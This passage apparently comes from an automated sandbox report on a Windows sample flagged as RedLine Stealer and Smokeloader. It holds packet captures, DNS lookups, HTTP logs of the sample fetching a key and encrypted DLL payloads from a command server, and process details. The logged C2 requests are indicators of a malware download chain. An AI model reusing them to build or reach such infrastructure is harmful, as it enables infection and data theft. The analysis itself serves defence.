                                                Dec 20, 2024 16:55:13.509833097 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.509885073 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.510529995 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.510603905 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.510680914 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.510868073 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.511428118 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.511476040 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.511617899 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.511975050 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.512325048 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.512404919 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.513106108 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.513154984 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.513284922 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.513325930 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.513382912 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.513434887 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.514240980 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.514292002 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.514686108 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.514731884 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.515175104 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.515225887 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.515254021 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.515319109 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.516089916 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.516139030 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.516494036 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.516544104 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.517035007 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.517086983 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.517298937 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.517395973 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.517986059 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.518032074 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.518991947 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.519006968 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.519042015 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.519077063 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.519119024 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.519908905 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.519958973 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.520497084 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.520576000 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.520809889 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.520823956 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.520869017 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.521780968 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.521826982 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.521956921 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.522192955 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.522694111 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.522707939 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.522753000 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.523668051 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.523683071 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.523730993 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.523747921 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.524574995 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.524641037 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.525530100 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.525548935 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.525600910 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.525636911 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.525801897 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.526463032 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.526519060 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.526742935 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.526793957 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.527410984 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.527476072 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.527513981 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.528410912 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.528458118 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.528698921 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.528743982 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.529300928 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.529401064 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.529484034 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.529611111 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.530273914 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.530312061 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.530527115 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.530570984 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.531202078 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.531260967 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.531305075 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.531358004 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.532068014 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.532155991 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.674813986 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.674849987 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.674911022 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.675177097 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.675307989 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.675398111 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.676096916 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.676179886 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.676208019 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.676528931 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.677014112 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.677068949 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.677082062 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.677311897 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.677983999 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.678047895 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.678108931 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.678296089 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.679044008 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.679156065 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.679207087 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.679837942 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.679889917 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.679939985 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.679987907 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.680836916 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.680926085 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.680964947 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.681015015 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.681742907 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.681998014 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.682271004 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.682322025 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.682706118 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.682719946 CET8049917185.156.73.23192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 20, 2024 16:53:39.239218950 CET5569253192.168.2.71.1.1.1
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 20, 2024 16:53:39.239218950 CET192.168.2.71.1.1.10xc309Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 20, 2024 16:53:38.649713993 CET1.1.1.1192.168.2.70x6b77No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Dec 20, 2024 16:53:38.649713993 CET1.1.1.1192.168.2.70x6b77No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                Dec 20, 2024 16:53:39.376498938 CET1.1.1.1192.168.2.70xc309No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                • 185.156.73.23
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749812185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:28.270270109 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:29.639238119 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:29.663031101 CET | 388 | OUT | GET /dll/key HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:30.138691902 CET | 224 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 21
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                Dec 20, 2024 16:54:30.143945932 CET | 393 | OUT | GET /dll/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:30.705207109 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:30 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                Content-Length: 97296
                                                Keep-Alive: timeout=5, max=98
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Dec 20, 2024 16:54:31.421030998 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:31.924001932 CET | 203 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:31 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=97
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:33.983324051 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:34.471118927 CET | 203 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:34 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=96
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:36.624047995 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:37.110507011 CET | 203 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:36 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=95
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:39.155319929 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:39.660120010 CET | 203 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:39 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=94
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.7 | 49844 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:54:41.822261095 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:43.152314901 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:42 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.7 | 49854 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:54:45.324004889 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:46.666903019 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:46 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.7 | 49869 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:54:51.122102976 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:52.469388008 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:52 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.7 | 49879 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:54:54.952054977 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:56.316867113 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:55 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.7 | 49888 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:54:58.480931997 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:59.827917099 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:59 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.7 | 49897 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:55:02.423856020 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:55:03.762080908 CET | 204 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:03 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.7 | 49908 | 185.156.73.23 | 80 | 7332 | C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 20, 2024 16:55:06.967533112 CET | 394 | OUT | GET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: d
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:55:08.487539053 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:07 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="dll";
                                                Content-Length: 242176
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream


                                                Session ID: 8
                                                Source IP: 192.168.2.7
                                                Source Port: 49917
                                                Destination IP: 185.156.73.23
                                                Destination Port: 80
                                                PID: 7332
                                                Process: C:\Users\user\Desktop\zSmMqGGeVy.exe

                                                Timestamp: Dec 20, 2024 16:55:09.562958956 CET
                                                Bytes transferred: 394
                                                Direction: OUT
                                                Data:
                                                GET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: s
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache

                                                Timestamp: Dec 20, 2024 16:55:11.171014071 CET
                                                Bytes transferred: 1236
                                                Direction: IN
                                                Data:
                                                HTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="soft";
                                                Content-Length: 1502720
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream


                                                Target ID:0
                                                Start time:10:53:42
                                                Start date:20/12/2024
                                                Path:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\zSmMqGGeVy.exe"
                                                Imagebase:0x400000
                                                File size:1'903'104 bytes
                                                MD5 hash:83AA26BD8755E994141C4B6D525307BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:10:55:14
                                                Start date:20/12/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480
                                                Imagebase:0xc90000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

